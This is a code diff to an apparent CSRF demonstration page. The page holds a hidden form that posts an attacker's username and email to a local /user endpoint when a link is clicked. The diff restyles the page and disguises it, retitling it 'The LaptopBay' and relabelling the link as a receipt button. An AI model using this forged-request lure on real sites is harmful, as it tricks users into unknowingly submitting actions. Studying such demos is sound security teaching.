--- a/views/index.ejs
+++ b/views/index.ejs
@@ -9,15 +9,27 @@
     <link rel="stylesheet" href="css/index.css">
     <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">
   </head>
+  <style>
+    .btn{
+      background-color : #DFD0B8 !important;
+      color: black !important;
+      text-decoration: none !important;
+    }
+
+    .btn:hover{
+      background-color: #dfd8cd !important;
+      text-decoration: none;
+    }
+  </style>
   <body>
-    <h1>The Attacker Website</h1>
+    <h1>The LaptopBay</h1>
 
     <section>
       <form method="post" action="http://localhost:3000/user">
           <input type="hidden" name="username" value="The Attacker">
           <input type="hidden" name="email" value="theattacker@attacker.com">
       </form>
-      <a href="#" onclick="document.forms[0].submit()">Visit this website!</a>
+      <a href="#" onclick="document.forms[0].submit()" class="btn btn-light" >Click here to View Receipt</a>
     </section>
     
   </body>
